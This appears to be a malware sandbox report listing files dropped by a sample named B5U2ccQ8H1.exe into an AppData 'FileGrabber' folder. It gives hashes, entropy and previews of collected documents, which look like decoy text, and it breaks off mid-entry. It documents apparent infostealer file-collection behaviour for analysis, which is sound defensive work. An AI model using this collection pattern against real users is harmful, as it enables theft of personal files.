Preview:	VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

C:\Users\user\AppData\Roaming\928100\FileGrabber\Documents\UMMBDNEQBN.pdf

Download File

Process:	C:\Users\user\Desktop\B5U2ccQ8H1.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695685570184741
Encrypted:	false
SSDEEP:	24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
MD5:	A28F7445BB3D064C83EB9DBC98091F76
SHA1:	D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
SHA-256:	10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
SHA-512:	42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
Malicious:	false
Preview:	UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

C:\Users\user\AppData\Roaming\928100\FileGrabber\Documents\VLZDGUKUTZ.docx

Download File

Process:	C:\Users\user\Desktop\B5U2ccQ8H1.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701757898321461
Encrypted:	false
SSDEEP:	24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
MD5:	520219000D5681B63804A2D138617B27
SHA1:	2C7827C354FD7A58FB662266B7E3008AFB42C567
SHA-256:	C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
SHA-512:	C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
Malicious:	false
Preview:	VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

C:\Users\user\AppData\Roaming\928100\FileGrabber\Documents\VLZDGUKUTZ.xlsx

Download File

Process:	C:\Users\user\Desktop\B5U2ccQ8H1.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701757898321461
Encrypted:	false
SSDEEP:	24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
MD5:	520219000D5681B63804A2D138617B27
SHA1:	2C7827C354FD7A58FB662266B7E3008AFB42C567
SHA-256:	C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
SHA-512:	C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
Malicious:	false
Preview:	VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

C:\Users\user\AppData\Roaming\928100\FileGrabber\Documents\VLZDGUKUTZ\DVWHKMNFNN.pdf

Download File

Process:	C:\Users\user\Desktop\B5U2ccQ8H1.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694985340190863
Encrypted:	false
SSDEEP:	24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
MD5:	C9386BC43BF8FA274422EB8AC6BAE1A9
SHA1:	2CBDE59ADA19F0389A4C482667EC370D68F51049
SHA-256:	F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
SHA-512:	7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
Malicious:	false
Preview:	DVWHKMNFNNSXRPFRFSVVCQPXSKWHKPJJHYQWYYFONAJQSCOHZADBHUOWOSPDVAOIQVOBHGMIENZQZLABYDKWXGSUQNSEINIQSVMZZWTJLYMGYBQHIJSUWZKJPGBZUGFOXNAMLQTVGWDCYDMNHGVRTUWNHIWXJNQONTAXVVVCFDLWYDVWNMKHRFTZAVEQPXZHSEXPEHWUHPJZDMDXPYEJBYWZOQETVPLRKQRCYTAXMNRBOUJSCYZOUPOBJUWFDMUYFBXCBLZHFHONIURELJQVLWAJRIQCHHASBUAREPSIMJIZDUKJCHMMSSWSEDFHFQOUVYZORWJIUACXUVQKUMLXTQIKDBVNZOHJYYECOBYPNRILKERBHKZPVUSQLHAQRTPWCRMZADYONIIOVUWOBVHAUGZVAGTZTZBMHSOOQORENTXCJFMVWMGLOOXBDWANXXJQQTBDTWOSPFMFVQKLNTSHOPQMHYRYZMWDXVFGWFOSCSFMKCDDHTOQHBTQAFQTXPUHHEAKYRCQIODCCSHRSAJQEFRHCQLQVVMUHWOHHQJPSHCNKRLIRESUXLZIYSWDHHYZVRKLAGFLVTEJQHEEMVUUEQKQMTBDXFGSROZTNPLCVTEEZGUUCQUEKNMQFATATJRARXQQMZYEVACDAXILYPEHYTJOQWSFAJEGHIDIXMKDXPATNSATPECIMRBZNBXXVMGPLMVEKCUOXJWFGQSTWPMTEMRCYGXECVTNKYROYRYTPRDPCFGGKUUBXXSDFZEJCQRIRFLCNMPMLIGUCYPHMWYVAIPAAPHTQAYFSJWLSCZICIXZHXNKAKRHJVENGZTUTVWSNYDDYMWQHHAITLUZXNORBLYTBVCEBWBMSVZXNZMKYFPRFPLFCUSJUWNKQJIZRVZASPVFSUSBYQZZWKEORBDDRCYRBTIMTLHDTZRQUKYJIWHXVJYPEZSDLWZVPZGEYQPCSGGVJXXBUCNBXKQPZTMTVPZUETYYLRJEDWIHAZMS

C:\Users\user\AppData\Roaming\928100\FileGrabber\Documents\VLZDGUKUTZ\KATAXZVCPS.xlsx

Download File

Process:	C:\Users\user\Desktop\B5U2ccQ8H1.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699548026888946
Encrypted:	false
SSDEEP:	24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
MD5:	A0DC32426FC8BF469784A49B3D092ADC
SHA1:	0C0EEB9B226B1B19A509D9864F8ADC521BF18350
SHA-256:	A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
SHA-512:	DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
Malicious:	false
Preview:	KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

C:\Users\user\AppData\Roaming\928100\FileGrabber\Documents\VLZDGUKUTZ\NWTVCDUMOB.jpg

Download File

Process:	C:\Users\user\Desktop\B5U2ccQ8H1.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696250160603532
Encrypted:	false
SSDEEP:	24:5Gvoddnzj/gxR0e7uyJ9MLyy07KpRnPgNcnA+2/nSgTfK0Xzy:wv4zCR0ouAMG3wPgNuAZnSQXzy
MD5:	2B6A90B7D410E3A4E2B32C90D816B4FE
SHA1:	B8CD90C4CDCF41CBF18D88A4C01BBA22F670AD83
SHA-256:	D65D483904467EB7373EDA8DFAE2070C057FC93465A4AC5C9FEF8B42340D9DAB
SHA-512:	03AFBF42E5C04E928D03C687B0F17A0AB15428C78958B206DC6C50118B961C9DDF88A6E53B3115F09FDEE44EAFA46B262933164055532D3B4B4F9265F42A6C58
Malicious:	false
Preview:	NWTVCDUMOBTPRQQPHXQLIMGPJXTEMPBNYLBFKQFUEVGISJSVQRMPMZSAYEYQSOTUAJFILXLTKFEVHLSAMYEEFLNJSHLTTFXRTDNUGXEFIGVCAWPMDNUICDIZGPHMESKWSMUPNOFEVXFTSHSKLCVHQTNKDHDMDRJOUTEUSCAUAVMVBMOSYKKRPPZYFUGXFXWMWRACKFCQOUHITLUCHGFZEOIPNCJFJOVBZIKDRNERXOSPKSRMHKTJUGFEOONFWLVNTJWXUFPADWYIUDKAZQXCZRFPUQQAMRTIOEHUDTLGOWYMIDOZAXTLGVEGUCQLJZGMIEQYOLWEMSGZUBWXOIBQEMQLQVGRBTUICFCEJGFTZRZCKJQEMATEONIMJKBYGQYDYXOLLROWXGYCNCVPTMRZSMMSZXKMNPSCJJJKKNRAJXGSLZNKJRJRGMCCCBCIGTLTFKNVDVIHYLGRNXDVIVWBCPNKNIFJAPQQWDQQEDDKNHVJRQJTKCUADORWREEDYTVFAOWHPNXWSNAJCVXCLLTNQPMJQHDILFNQUZJZZJJMMNDNGEBEGSTVAGZJMSMZHWJKNIAFGBUYMVADKCVLDGFQETUZXGUOUWXBBPNOWFERKMKMPOXIOTKJERPVXJGCIUKAGDGITLFYRIBAPKRESMNOMTVTZCXMODUUIGFMEMBMGAGXFZGAAZFCXDWBKKCPUKFFNMVKDFFVZYWKEKBWMADWDZXUIOOLCLIACESGRBJRSMXKUSOKXJEICCPRFWSISDTKVTDVAYSWLRHTWJGCXQMNITQJHCBMSCDRWKMGADWILLATOPVPILEQQGAIPRRUCJFTRRSSWITQKIWJOATZOBETZDBBWAIJIOXCUQSILQHQKEZXWFWWNVEWKZCGFYPBDSDBSFAZDZFRHJBZIGOZCVUGODUTNCDHKKMFHSYKUSFSXOMOUXZYOSUZNJQBXAVPOBTVBINMSIPYONLYRKIHONKWHSUAJWIALOTZAQJSNTIH

C:\Users\user\AppData\Roaming\928100\FileGrabber\Documents\VLZDGUKUTZ\VLZDGUKUTZ.docx

Download File

Process:	C:\Users\user\Desktop\B5U2ccQ8H1.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701757898321461
Encrypted:	false
SSDEEP:	24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
MD5:	520219000D5681B63804A2D138617B27
SHA1:	2C7827C354FD7A58FB662266B7E3008AFB42C567
SHA-256:	C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
SHA-512:	C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
Malicious:	false
Preview:	VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

C:\Users\user\AppData\Roaming\928100\FileGrabber\Documents\VLZDGUKUTZ\YPSIACHYXW.png

Download File

Process:	C:\Users\user\Desktop\B5U2ccQ8H1.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.700014595314478
Encrypted:	false
SSDEEP:	24:ZUpld6DFp3zvtLC4Tmg3c0x2ngfNqdsD1OqVMyUXHt/Sv0vyjsbsV:upqDL3hO4TRc4Eq8tKvYgV
MD5:	960373CA97DEDBA8576ECF40D0D1E39D
SHA1:	E89C5AC4CF0B920C373CFA7D365C40C1009A14F6
SHA-256:	501DC438F0E931ABED9FDE388BA5A8FAE8445117823118C413F54793F0E10FD7
SHA-512:	93B34F6BC4DCEA41103E31272F2DC9CF07CC100F934CECC8F4317525DA65128DBBAD75B23CE40D46EE1DC11D10147250CAE33F01220F5624E2406B2596B726EB
Malicious:	false
Preview:	YPSIACHYXWDOAOALJCJYYKHKMGYIZBYLJSULATZCLAKGTHKIZZZPZMBAJFNQKRWGKHDEEYLGCRMYXVOJCXPRDOFVVXDFSZNRLGLUNBQSCSVJXKHLUFNOKRCASVQNUJDYWNWTNGJYBIKCERFIRWTZVUUNKNCMUGKTMSRIVLFQTZDVSHZTYRURNPZRSHICVPPIWUNOSYRCNVXHOFETKZDTIEIOQHCHWHDXEDXBZFSWIFFLXTXQXUBJCTQSDGVAMQKTUHJAAEDEECWFOEDCAALGNKEQRGJPVEEVJPTSROUZFPHKPUHLAYRHVULFESXXGKSAIYLAVSWMISSCMRGVQGXFGFYXBQBRZHILLZQUJRQJHUVBFDBPCNUAKOXURUUUKQNRUEAXAAXWIVATBILRXVUBDTFNWUQLPZELETXDQPCWJXRRAQILAVVZFAMGUWUYYORCQNUYLSNLTNXIAWJVDTPNCZPHSWYWWTBBJECMEGHRCATJANBKSCMLVOBOTXPKGMTOJISGOTUUOFVJPAGNMHFSAFRHQUHMYURLAJVNZPEMNMUDZAUMRZHQJBWVCUSQAENWUTRFBUFUWIPJYVLYDUIBJSTTFGSFBHTKIXJNVJUYJGSHZHMDONOHBMLQDTHGTPLYVKGUXWHEYTHTWOOMQOGUFQGRWUYBVWILTRHBAIJHZKXNAQYAIZBPYWWZSBDWNPRWGFXHNPFFMHKCCERIWCTACKIVXLZBNOTBYDOPJBYTZWNSXYXVYPHAGUHBXKPPAFNZGWEKOBPXTCLBIOEIVWLELPXJAINCDBEUOIFMNFWSRDONSGUCNGDZLIAFVNUQXZMTVJLIACGEXXESAGRKCPJNTKZHMMCTJZCLWNTNEJFUCODLVBCJHINWJYBLRXSKLVKNYGPLXGKEHMXSDKIAPHRGHBOCHQEJPMJEKRMRTLJNYNRHDPPQKJHXGYJMDUOESMBVJOBKJWUUSSZEQAGHANSYFBHIZFXSLENBLJWCHGEM

C:\Users\user\AppData\Roaming\928100\FileGrabber\Documents\YPSIACHYXW.png

Download File

Process:	C:\Users\user\Desktop\B5U2ccQ8H1.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.700014595314478
Encrypted:	false
SSDEEP:	24:ZUpld6DFp3zvtLC4Tmg3c0x2ngfNqdsD1OqVMyUXHt/Sv0vyjsbsV:upqDL3hO4TRc4Eq8tKvYgV
MD5:	960373CA97DEDBA8576ECF40D0D1E39D
SHA1:	E89C5AC4CF0B920C373CFA7D365C40C1009A14F6
SHA-256:	501DC438F0E931ABED9FDE388BA5A8FAE8445117823118C413F54793F0E10FD7
SHA-512:	93B34F6BC4DCEA41103E31272F2DC9CF07CC100F934CECC8F4317525DA65128DBBAD75B23CE40D46EE1DC11D10147250CAE33F01220F5624E2406B2596B726EB
Malicious:	false
Preview:	YPSIACHYXWDOAOALJCJYYKHKMGYIZBYLJSULATZCLAKGTHKIZZZPZMBAJFNQKRWGKHDEEYLGCRMYXVOJCXPRDOFVVXDFSZNRLGLUNBQSCSVJXKHLUFNOKRCASVQNUJDYWNWTNGJYBIKCERFIRWTZVUUNKNCMUGKTMSRIVLFQTZDVSHZTYRURNPZRSHICVPPIWUNOSYRCNVXHOFETKZDTIEIOQHCHWHDXEDXBZFSWIFFLXTXQXUBJCTQSDGVAMQKTUHJAAEDEECWFOEDCAALGNKEQRGJPVEEVJPTSROUZFPHKPUHLAYRHVULFESXXGKSAIYLAVSWMISSCMRGVQGXFGFYXBQBRZHILLZQUJRQJHUVBFDBPCNUAKOXURUUUKQNRUEAXAAXWIVATBILRXVUBDTFNWUQLPZELETXDQPCWJXRRAQILAVVZFAMGUWUYYORCQNUYLSNLTNXIAWJVDTPNCZPHSWYWWTBBJECMEGHRCATJANBKSCMLVOBOTXPKGMTOJISGOTUUOFVJPAGNMHFSAFRHQUHMYURLAJVNZPEMNMUDZAUMRZHQJBWVCUSQAENWUTRFBUFUWIPJYVLYDUIBJSTTFGSFBHTKIXJNVJUYJGSHZHMDONOHBMLQDTHGTPLYVKGUXWHEYTHTWOOMQOGUFQGRWUYBVWILTRHBAIJHZKXNAQYAIZBPYWWZSBDWNPRWGFXHNPFFMHKCCERIWCTACKIVXLZBNOTBYDOPJBYTZWNSXYXVYPHAGUHBXKPPAFNZGWEKOBPXTCLBIOEIVWLELPXJAINCDBEUOIFMNFWSRDONSGUCNGDZLIAFVNUQXZMTVJLIACGEXXESAGRKCPJNTKZHMMCTJZCLWNTNEJFUCODLVBCJHINWJYBLRXSKLVKNYGPLXGKEHMXSDKIAPHRGHBOCHQEJPMJEKRMRTLJNYNRHDPPQKJHXGYJMDUOESMBVJOBKJWUUSSZEQAGHANSYFBHIZFXSLENBLJWCHGEM

C:\Users\user\AppData\Roaming\928100\FileGrabber\Documents\desktop.ini

Download File

Process:	C:\Users\user\Desktop\B5U2ccQ8H1.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	402
Entropy (8bit):	3.493087299556618
Encrypted:	false
SSDEEP:	12:QZsiL5wmHOlDmo0qmUclLwr2FlDmo0IWF9klrgl2FlDmo0qjKAev:QCGwv4o0hlLwiF4o0UUsF4o01AM
MD5:	ECF88F261853FE08D58E2E903220DA14
SHA1:	F72807A9E081906654AE196605E681D5938A2E6C
SHA-256:	CAFEC240D998E4B6E92AD1329CD417E8E9CBD73157488889FD93A542DE4A4844
SHA-512:	82C1C3DD163FBF7111C7EF5043B009DAFC320C0C5E088DEC16C835352C5FFB7D03C5829F65A9FF1DC357BAE97E8D2F9C3FC1E531FE193E84811FB8C62888A36B
Malicious:	false
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.7.0.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.1.2.....I.c.o.n.F.i.l.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.....I.c.o.n.I.n.d.e.x.=.-.2.3.5.....

C:\Users\user\AppData\Roaming\928100\FileGrabber\Downloads\DVWHKMNFNN.pdf

Download File

Process:	C:\Users\user\Desktop\B5U2ccQ8H1.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694985340190863
Encrypted:	false
SSDEEP:	24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
MD5:	C9386BC43BF8FA274422EB8AC6BAE1A9
SHA1:	2CBDE59ADA19F0389A4C482667EC370D68F51049
SHA-256:	F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
